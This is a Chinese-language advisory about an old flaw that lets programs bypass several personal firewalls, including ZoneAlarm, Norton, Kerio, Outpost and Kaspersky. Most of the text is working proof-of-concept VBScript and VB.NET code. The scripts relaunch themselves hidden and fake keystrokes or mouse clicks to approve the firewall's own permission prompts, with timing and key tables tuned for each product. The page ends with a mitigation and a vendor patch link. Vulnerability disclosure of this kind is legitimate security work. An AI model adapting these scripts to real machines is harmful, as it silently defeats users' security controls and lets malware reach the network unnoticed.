多个防火墙产品设置绕过漏洞

受影响系统：

Zone Labs ZoneAlarm Pro 4.5.538.001

Zone Labs ZoneAlarm Pro 4.5

Symantec Norton Personal Firewall 2004

Symantec Norton Personal Firewall 2003

Symantec Norton Personal Firewall 2002

Kerio Personal Firewall 4.1.2

Kerio Personal Firewall 4.1.1

Kerio Personal Firewall 4.1.0描述：

多数个人防火墙允许快捷方式或者接口控制通信。

多数个人防火墙访问实现控制存在问题，远程攻击者可以利用这个漏洞可以通过控制鼠标或者发送快捷方式来绕过防火墙控制，完全访问系统。

攻击者可以设置一个VBScript脚本，此脚本执行一个多线程的自身的实例并当第一个实例连接到Internet时发送快捷方式给防火墙，可导致控制防火墙行为，绕过控制。

另外也可以通过鼠标控件来绕过，程序没有使用一个实际的多先程，因为部分防火墙会直接打断程序执行，因此程序使用一个参数执行另一个自身的实例来实现，绕过防火墙控制。

利用这个问题，可导致木马等恶意程序进行SERVER监听或者直接访问防火墙而不被防火墙提示。

<*来源：Ferruh Mavituna （ferruh@mavituna.com）

链接：http://marc.theaimsgroup.com/?l=bugtraq&m=110478641332370&w=2

*>

测试方法：

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Ferruh Mavituna （ferruh@mavituna.com）提供了如下测试方法：

'***********************************************************

'// By Ferruh Mavituna

'// ferruh{@}mavituna.com, http://ferruh.mavituna.com

'***********************************************************

'// Date : 4/25/2004

'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and multithreading

'// Related Advisory : NOT PUBLISHED YET

'***********************************************************

'Modified for Agnitium Outpost Firewall 2.1.303.4009 (314)

'Tested : Agnitium Outpost Firewall 2.5.369.4608 (369)

'5/5/2004

'02.01.2005

'Ferruh Mavituna

'Const DELAY = 1000

'Const TIMES = 1

'Const EXTRADELAY = 0

'***********************************************************

Option Explicit

Dim argLen, shell, sendKeyMod, i, appName

Const DELAY = 1000

Const TIMES = 1

Const EXTRADELAY = 0

appName = Wscript.ScriptName

'SendKey

sendkeyMod = False

argLen = WScript.Arguments.Length

If argLen>0 Then sendkeyMod = True

Set shell = WScript.CreateObject("WScript.Shell")

If sendKeyMod Then

'First Sleep for a while

If EXTRADELAY>0 Then WScript.Sleep EXTRADELAY

'Force

While i<TIMES

i=i+1

WScript.Sleep DELAY

'1) First add it trusted

shell.sendKeys "+{TAB}" 'Go back once

shell.sendKeys "{UP 2}" 'Go Up

'1) Press Enter

shell.sendKeys "{ENTER}" 'Enter

Wend

'Exit

'Wscript.Echo "Exit !"

Wscript.Quit 1

End If

'Wscript.Echo WScript.ScriptFullName

Call shell.Run(appName & " /send")

'Connect

Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission Accomplished..."

Set shell = Nothing

Wscript.Quit 1

Function connect(ByVal URL)

Dim web

Set web = CreateObject("Microsoft.XmlHttp")

web.open "HEAD", URL, FALSE

web.send ""

connect = web.getAllResponseHeaders

Set web = Nothing

End Function

["anti-hacker.txt" (text/plain)]

'***********************************************************

'// By Ferruh Mavituna

'// ferruh{@}mavituna.com, http://ferruh.mavituna.com

'***********************************************************

'// Date : 4/25/2004

'// Simple POC for Bypassing multiple firewall products

'// Related Advisory : NOT PUBLISHED YET

'***********************************************************

'HISTORY

'3/5/2004

'Added ZA

'5/5/2004

'Added Kerio, Outpost

'6/5/2004

'Added Kaspersky Anti-Hacker

'***********************************************************

Option Explicit

Dim arrKeys(5,5), arrDelays(5,2), arrRegistry(5,1),intFirewall

Const EXTRADELAY = 0

Const DETERMINEFIREWALL = FALSE 'Auto Determine current Firewall

'----------------------------------------------

'Define Delays and Times for Firewalls

'----------------------------------------------

'// Firewalls

'ZoneAlarm Pro, 4.5.530 (tested Windows 2003 & WinXP)

Const ZoneAlarm = 0

'Kerio 4.0.14

Const Kerio = 1

'Agnitium Outpost Firewall 2.1.303.4009 (314)

Const Outpost = 2

'Kaspersky Anti-Hacker 1.5.119.0

Const Kaspersky = 3

'Select Active Firewall

intFirewall = Kaspersky

'// Configuration

'Kaspersky Anti-Hacker

arrDelays(Kaspersky,0) = 1000

arrDelays(Kaspersky,1) = 1

'Define Keys for Firewalls

arrKeys(Kaspersky,0) = "{ENTER}"

If DETERMINEFIREWALL Then

'TODO:Read Registries and determine it !

End If

Dim argLen, shell, sendKeyMod, i, j, appName

appName = Wscript.ScriptName

'SendKey

sendkeyMod = False

argLen = WScript.Arguments.Length

If argLen>0 Then sendkeyMod = True

Set shell = WScript.CreateObject("WScript.Shell")

If sendKeyMod Then

'First Sleep for a while

If EXTRADELAY>0 Then WScript.Sleep EXTRADELAY

'Force

While i<arrDelays(intFirewall,1)

i=i+1

WScript.Sleep arrDelays(intFirewall,0)

'Send Keys

For j=0 To Ubound(arrKeys,2)

If arrKeys(intFirewall,j)<>"" Then

shell.sendKeys arrKeys(intFirewall,j)

End If

Next

Wend

'Exit

'Wscript.Echo "Exit !"

Wscript.Quit 1

End If

'Wscript.Echo WScript.ScriptFullName

Call shell.Run(appName & " /send")

'Connect

Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission Accomplished..."

Set shell = Nothing

Wscript.Quit 1

Function connect(ByVal URL)

Dim web

Set web = CreateObject("Microsoft.XmlHttp")

web.open "HEAD", URL, FALSE

web.send ""

connect = web.getAllResponseHeaders

Set web = Nothing

End Function

["ZoneAlarm.txt" (text/plain)]

'***********************************************************

'// By Ferruh Mavituna

'// ferruh{@}mavituna.com, http://ferruh.mavituna.com

'***********************************************************

'// Date : 4/25/2004

'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and multithreading

'// Related Advisory : NOT PUBLISHED YET

'***********************************************************

Option Explicit

Dim argLen, shell, sendKeyMod, i

Const DELAY = 10

Const TIMES = 15

'SendKey

sendkeyMod = False

argLen = WScript.Arguments.Length

If argLen>0 Then sendkeyMod = True

Set shell = WScript.CreateObject("WScript.Shell")

If sendKeyMod Then

While i<TIMES

i=i+1

WScript.Sleep DELAY

shell.sendKeys "%R" 'Remember, Do not ask again !

shell.sendKeys "%Y" 'Click Yes

Wend

'Exit

'Wscript.Echo "Exit !"

Wscript.Quit 1

End If

'Wscript.Echo WScript.ScriptFullName

Call shell.Run("skipZA.vbs /send")

'Connect

Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission Accomplished..."

Set shell = Nothing

Wscript.Quit 1

Function connect(ByVal URL)

Dim web

Set web = CreateObject("Microsoft.XmlHttp")

web.open "HEAD", URL, FALSE

web.send ""

connect = web.getAllResponseHeaders

Set web = Nothing

End Function

["testFirewall.txt" (text/plain)]

'***********************************************************

'// By Ferruh Mavituna

'// ferruh{@}mavituna.com, http://ferruh.mavituna.com

'***********************************************************

'// Date : 4/25/2004

'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and multithreading

'// Simple Firewall Test File

'// Related Advisory : NOT PUBLISHED YET

'***********************************************************

Option Explicit

Dim shell, sendKeyMod, Result

Const URL = "http://ferruh.mavituna.com"

'Connect

Wscript.Echo "Now I'll try to connect to " & URL

If connect(URL,Result) Then

Wscript.Echo "Mission Accomplished..., Here is the headers;" & vbNewline & Result

Else

Wscript.Echo "OK, I couldn't access to Internet"

End If

Set shell = Nothing

Wscript.Quit 1

Function connect(ByVal URL, ByRef Result)

connect = True

On Error Resume Next

ERR.Clear

Dim web

Set web = CreateObject("Microsoft.XmlHttp")

web.open "HEAD", URL, FALSE

web.send ""

Result = web.getAllResponseHeaders

Set web = Nothing

If ERR<>0 Then connect = False

End Function

["norton.txt" (text/plain)]

'***********************************************************

'// By Ferruh Mavituna

'// ferruh{@}mavituna.com, http://ferruh.mavituna.com

'***********************************************************

'// Date : 4/25/2004

'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and multithreading

'// Related Advisory : NOT PUBLISHED YET

'***********************************************************

Option Explicit

Dim argLen, shell, sendKeyMod, i

Const DELAY = 10

Const TIMES = 15

'SendKey

sendkeyMod = False

argLen = WScript.Arguments.Length

If argLen>0 Then sendkeyMod = True

Set shell = WScript.CreateObject("WScript.Shell")

If sendKeyMod Then

While i<TIMES

i=i+1

WScript.Sleep DELAY

shell.sendKeys "%A" 'Remember, Do not ask again !

shell.sendKeys "%O" 'Click Yes

Wend

'Customized for norton fw by Oezguer Mavituna

'Exit

'Wscript.Echo "Exit !"

Wscript.Quit 1

End If

'Wscript.Echo WScript.ScriptFullName

Call shell.Run("skipZA.vbs /send")

'Connect

Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission Accomplished..."

Set shell = Nothing

Wscript.Quit 1

Function connect(ByVal URL)

Dim web

Set web = CreateObject("Microsoft.XmlHttp")

web.open "HEAD", URL, FALSE

web.send ""

connect = web.getAllResponseHeaders

Set web = Nothing

End Function

["mousecontrol.txt" (text/plain)]

'***********************************************************

'// By Ferruh Mavituna

'// ferruh{@}mavituna.com, http://ferruh.mavituna.com

'***********************************************************

'// Date : 5/19/2004

'// Simple POC for Bypassing multiple firewall products

'// Code : VB.NET

'***********************************************************

Private Declare Sub mouse_event Lib "user32" (ByVal dwFlags As Long, ByVal dx As Long, ByVal dy As Long, ByVal cbuttons As Long, ByVal dwExtraInfo As Long) Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)

Private Const MOUSEEVENTF_LEFTDOWN = &H2

Private Const MOUSEEVENTF_LEFTUP = &H4

Private Const MOUSEEVENTF_MIDDLEDOWN = &H20

Private Const MOUSEEVENTF_MIDDLEUP = &H40

Private Const MOUSEEVENTF_RIGHTDOWN = &H8

Private Const MOUSEEVENTF_RIGHTUP = &H10

Private Const sleepTime = 0.5 'As Second

Private Const slowMotion = True 'Debug !

'Firewalls

Const ZoneAlarm As Integer = 0

'Set Points

Dim arrFirewalls(1, 3) As Integer

Dim activeFirewall As Integer = ZoneAlarm

Private Sub setupFirewalls()

'Get Current Screen

'This is just POC, Real World Example should automaticly detect installed firewall, change sleep times, car about exact positoin, taskbar position etc. But It's easy to write a real world example Dim screenY As Integer = Screen.PrimaryScreen.Bounds.Height Dim screenX As Integer = Screen.PrimaryScreen.Bounds.Width

arrFirewalls(ZoneAlarm, 0) = screenX - 250 'X Remember !

arrFirewalls(ZoneAlarm, 1) = screenY - 130 'Y

arrFirewalls(ZoneAlarm, 2) = screenX - 190 ' Yes

arrFirewalls(ZoneAlarm, 3) = screenY - 93

End Sub

Private Sub frmFirewallTest_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load

'Hide App

Me.ShowInTaskbar = False

Me.Visible = False

'Args

Dim flagArg As String = Application.ExecutablePath

If Environment.GetCommandLineArgs().Length > 1 Then

'Sleep;

Sleep(sleepTime * 1000)

'Try;

setupFirewalls()

If slowMotion Then Sleep(1000)

'First Access

bypassFirewall(arrFirewalls(activeFirewall, 0), arrFirewalls(activeFirewall, 1))

If slowMotion Then Sleep(1000)

bypassFirewall(arrFirewalls(activeFirewall, 2), arrFirewalls(activeFirewall, 3))

'Gain Access for HTTP

Sleep(300)

If slowMotion Then Sleep(1000)

bypassFirewall(arrFirewalls(activeFirewall, 0), arrFirewalls(activeFirewall, 1))

If slowMotion Then Sleep(1000)

bypassFirewall(arrFirewalls(activeFirewall, 2), arrFirewalls(activeFirewall, 3))

'Quit !

Me.Dispose()

Else

System.Diagnostics.Process.Start(flagArg, "skipme")

'Access Internet

If downloadURL() Then

MessageBox.Show("Successed !, Firewall ByPassed !", "Firewall ByPassed !", MessageBoxButtons.OK, MessageBoxIcon.Warning)

End If

Me.Dispose()

End If

End Sub

'Bypas POC

Private Sub bypassFirewall(ByVal X As Integer, ByVal Y As Integer)

'Save Old Positions for return !

Dim oldX As Integer = Cursor.Position.X

Dim oldY As Integer = Cursor.Position.Y

'Set New Position

Cursor.Position = New Point(X, Y)

'Click

mouse_event(MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0)

mouse_event(MOUSEEVENTF_LEFTUP, 0, 0, 0, 0)

'Return

Cursor.Position = New Point(oldX, oldY)

End Sub

'Connect Internet

Private Function downloadURL() As Boolean

downloadURL = True

Try

Dim wc As New System.Net.WebClient()

wc.DownloadFile("http://ferruh.mavituna.com", "C:\firewalltest.htm")

Catch

MessageBox.Show("Can not connected !", "Not Connected !", MessageBoxButtons.OK, MessageBoxIcon.Error) downloadURL = False

End Try

End Function

["bypassSendKey.txt" (text/plain)]

'***********************************************************

'// By Ferruh Mavituna

'// ferruh{@}mavituna.com, http://ferruh.mavituna.com

'***********************************************************

'// Date : 4/25/2004

'// Simple POC for Bypassing multiple firewall products

'***********************************************************

'HISTORY

'3/5/2004

'Added ZA

'5/5/2004

'Added Kerio, Outpost

'6/5/2004

'Added Kaspersky Anti-Hacker

'5/9/2004

'LooknStop

'5/20/2004

'Norton

'***********************************************************

Option Explicit

Dim arrKeys(5,5), arrDelays(5,2), arrRegistry(5,1),intFirewall

Const EXTRADELAY = 0

Const DETERMINEFIREWALL = FALSE 'Auto Determine current Firewall

'----------------------------------------------

'Define Delays and Times for Firewalls

'----------------------------------------------

'// Firewalls

'ZoneAlarm Pro, 4.5.530 (tested Windows 2003 & WinXP) | www.zonelabs.com

Const ZoneAlarm = 0

'Kerio 4.0.14

Const Kerio = 1

'Agnitium Outpost Firewall 2.1.303.4009 (314) | www.agnitium.com

Const Outpost = 2

'Kaspersky Anti-Hacker 1.5.119.0 | www.kaspersky.com

Const Kaspersky = 3

'Look 'n' Stop 2.04p2 | www.looknstop.com

Const LooknStop = 4

'Norton | www.norton.com

Const Norton = 5

'Select Active Firewall

intFirewall = ZoneAlarm

'// Configuration

'Define Keys, Delays, Repeat Times for Firewalls

'Kaspersky Anti-Hacker

arrDelays(Kaspersky,0) = 400

arrDelays(Kaspersky,1) = 2

arrKeys(Kaspersky,0) = "{ENTER}" 'Just say OK

'ZoneAlarm

arrDelays(ZoneAlarm,0) = 10

arrDelays(ZoneAlarm,1) = 15

arrKeys(ZoneAlarm,0) = "%R" 'Select Remember

arrKeys(ZoneAlarm,1) = "%Y" 'Yes

'Outpost

arrDelays(Outpost,0) = 1000

arrDelays(Outpost,1) = 1

arrKeys(Outpost,0) = "+{TAB}" 'Go back once

arrKeys(Outpost,1) = "{UP 2}" 'Go Up

arrKeys(Outpost,1) = "{ENTER}" 'Enter

'Kerio

arrDelays(Kerio,0) = 100

arrDelays(Kerio,1) = 10

arrKeys(Kerio,0) = " " ' Space - Remember, Do not ask again !

arrKeys(Kerio,1) = "%P" ' Yes

'LookNStop

arrDelays(LooknStop,0) = 1000

arrDelays(LooknStop,1) = 1

arrKeys(LooknStop,0) = "(%+{TAB})" ' Authorize

arrKeys(LooknStop,1) = "{LEFT}" ' Left

arrKeys(LooknStop, 2) = " " ' Space

'Norton

arrDelays(Norton,0) = 100

arrDelays(Norton,1) = 5

arrKeys(Norton,0) = "%A" ' Allow

arrKeys(Norton,1) = "%O" ' OK

If DETERMINEFIREWALL Then

'TODO:Read Registries and determine it !

End If

Dim argLen, shell, sendKeyMod, i, j, appName

appName = Wscript.ScriptName

'SendKey

sendkeyMod = False

argLen = WScript.Arguments.Length

If argLen>0 Then sendkeyMod = True

Set shell = WScript.CreateObject("WScript.Shell")

If sendKeyMod Then

'First Sleep for a while

If EXTRADELAY>0 Then WScript.Sleep EXTRADELAY

'Force

While i<arrDelays(intFirewall,1)

i=i+1

WScript.Sleep arrDelays(intFirewall,0)

'Send Keys

For j=0 To Ubound(arrKeys,2)

If arrKeys(intFirewall,j)<>"" Then

shell.sendKeys arrKeys(intFirewall,j)

End If

Next

Wend

'Exit

'Wscript.Echo "Exit !"

Wscript.Quit 1

End If

'Wscript.Echo WScript.ScriptFullName

Call shell.Run(appName & " /send")

'Connect

Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission Accomplished..."

Set shell = Nothing

Wscript.Quit 1

Function connect(ByVal URL)

Dim web

Set web = CreateObject("Microsoft.XmlHttp")

web.open "HEAD", URL, FALSE

web.send ""

connect = web.getAllResponseHeaders

Set web = Nothing

End Function

["Kerio.txt" (text/plain)]

'***********************************************************

'// By Ferruh Mavituna

'// ferruh{@}mavituna.com, http://ferruh.mavituna.com

'***********************************************************

'// Date : 4/25/2004

'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and multithreading

'// Related Advisory : NOT PUBLISHED YET

'***********************************************************

'Modified for Kerio 4.0.14

'5/5/2004

'Ferruh Mavituna

'Const DELAY = 100

'Const TIMES = 10

'***********************************************************

Option Explicit

Dim argLen, shell, sendKeyMod, i, appName

Const DELAY = 100

Const TIMES = 10

appName = Wscript.ScriptName

'SendKey

sendkeyMod = False

argLen = WScript.Arguments.Length

If argLen>0 Then sendkeyMod = True

Set shell = WScript.CreateObject("WScript.Shell")

If sendKeyMod Then

While i<TIMES

i=i+1

WScript.Sleep DELAY

shell.sendKeys " " 'Remember, Do not ask again !

shell.sendKeys "%P" 'Click Yes

Wend

'Exit

'Wscript.Echo "Exit !"

Wscript.Quit 1

End If

'Wscript.Echo WScript.ScriptFullName

Call shell.Run(appName & " /send")

'Connect

Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission Accomplished..."

Set shell = Nothing

Wscript.Quit 1

Function connect(ByVal URL)

Dim web

Set web = CreateObject("Microsoft.XmlHttp")

web.open "HEAD", URL, FALSE

web.send ""

connect = web.getAllResponseHeaders

Set web = Nothing

End Function

建议：

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 所有允许的行为必须询问密码。

厂商补丁：

Zone Labs

---------

ZoneLabs Team已经提供最新版本修正此漏洞：

http://www.zonelabs.com/

• ·Exchange Server 2003 书籍
• ·VC++下使用ADO编写数据库程序
• ·使用ODBC访问数据库(二)
• ·C#调用ORACLE存储过程返回结果集及函数
• ·[蛙蛙推荐]用JS自动生成等比例缩略图
• ·使用ODBC访问数据库(一)
• ·MATLAB的GUI应用程序设计
• ·Win+Apache+PHP+MySQL+Tc
• ·FreeType2的简单使用：平台无关的Tru
• ·Taglib原理和实现之El表达式和JSTL标